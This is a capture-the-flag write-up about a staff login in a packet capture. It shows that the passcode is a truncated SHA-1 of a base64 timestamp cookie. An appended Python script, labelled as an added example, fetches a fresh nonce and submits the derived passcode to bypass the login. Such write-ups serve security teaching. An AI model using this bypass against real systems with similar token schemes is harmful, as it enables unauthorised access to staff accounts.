Tags: web pcap hash cookies
> People seem to have some doohickey that lets them login with a code...
Again, we have the same PCAP.
There are four instances where a POST request is sent to `/staff.html` with a `passcode` parameter, using the following values:
5004f47a 01c7aeb1 097b3acf 54f03ae2
Unfortunately, just replaying those values causes an error message, even if the `WifiKey nonce` cookie is set as in the capture.
One notices that in the browser an additional cookie called `WifiKey alg` (with the value `SHA1`) is set, which is not present in the capture.
Analysing the packet from the capture that used `WifiKey nonce=MjAyMC0wNC0wOCAxNzowMw==` and the passcode `097b3acf`, we can decode the nonce and find out how the passcode is created:
echo "MjAyMC0wNC0wOCAxNzowMw=="|base64 -d     # -> 2020-04-08 17:03, a timestamp with minute resolution
echo -n "MjAyMC0wNC0wOCAxNzowMw=="|sha1sum    # -n: no trailing newline; the first 8 hex chars are the passcode 097b3acf
So all we gotta do is open the webpage, extract the nonce we receive in the `WifiKey nonce` cookie, hash the raw cookie value with SHA-1 and send the first 8 hex characters as the passcode, with the `WifiKey alg=SHA1` cookie set. As long as we do this within one minute of receiving the nonce (it is a timestamp with minute resolution, so it rolls over every minute), we get the flag:
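The same procedure as a script, added here as an example and not part of the original writeup. The passcode derivation follows the commands above (SHA-1 over the raw base64 cookie value, no trailing newline, first 8 hex characters); the cookie names are the ones seen in the capture and the browser. The target URL is a hypothetical command-line argument, and the offline check at the bottom uses the nonce from the captured packet.

```python
"""Added example (not from the original writeup): automate the WifiKey
passcode derivation. The target URL is hypothetical; the offline check
uses the nonce taken from the captured packet."""
import base64
import hashlib
import re
import sys
import urllib.parse
import urllib.request

NONCE_COOKIE = "WifiKey nonce"   # cookie name as seen in the capture
ALG_COOKIE = "WifiKey alg"       # set by the browser, absent from the capture
ALG_VALUE = "SHA1"


def decode_nonce(nonce: str) -> str:
    """The nonce is a base64-encoded timestamp with minute resolution."""
    return base64.b64decode(nonce).decode()


def passcode_from_nonce(nonce: str) -> str:
    """SHA-1 over the raw base64 cookie value, exactly like
    `echo -n <nonce> | sha1sum`, truncated to the first 8 hex characters."""
    return hashlib.sha1(nonce.encode()).hexdigest()[:8]


def parse_nonce(set_cookie_headers) -> str:
    """Pull the nonce out of a list of Set-Cookie header values.
    The cookie name contains a space, which http.cookies rejects,
    so it is matched by hand."""
    pattern = re.compile(re.escape(NONCE_COOKIE) + r"=([^;]+)")
    for header in set_cookie_headers:
        match = pattern.search(header)
        if match:
            return match.group(1).strip()
    raise ValueError("no WifiKey nonce cookie in response")


def solve(base_url: str) -> bytes:
    """Fetch the page for a fresh nonce, then POST the derived passcode
    right away: the nonce changes every minute, so the two requests must
    fall inside the same one-minute window. base_url is hypothetical."""
    with urllib.request.urlopen(base_url) as resp:
        nonce = parse_nonce(resp.headers.get_all("Set-Cookie") or [])
    passcode = passcode_from_nonce(nonce)
    cookie = f"{NONCE_COOKIE}={nonce}; {ALG_COOKIE}={ALG_VALUE}"
    body = urllib.parse.urlencode({"passcode": passcode}).encode()
    req = urllib.request.Request(
        urllib.parse.urljoin(base_url, "/staff.html"),
        data=body,
        headers={"Cookie": cookie,
                 "Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return resp.read()


if __name__ == "__main__":
    # Offline check against the captured packet: the nonce decodes to
    # 2020-04-08 17:03, and the capture shows the passcode 097b3acf for it.
    captured_nonce = "MjAyMC0wNC0wOCAxNzowMw=="
    print(decode_nonce(captured_nonce), passcode_from_nonce(captured_nonce))
    if len(sys.argv) > 1:
        print(solve(sys.argv[1]).decode(errors="replace"))
```

Run it without arguments to reproduce the derivation from the captured packet, or pass the base URL of the target to fetch a fresh nonce and submit the passcode within the same minute.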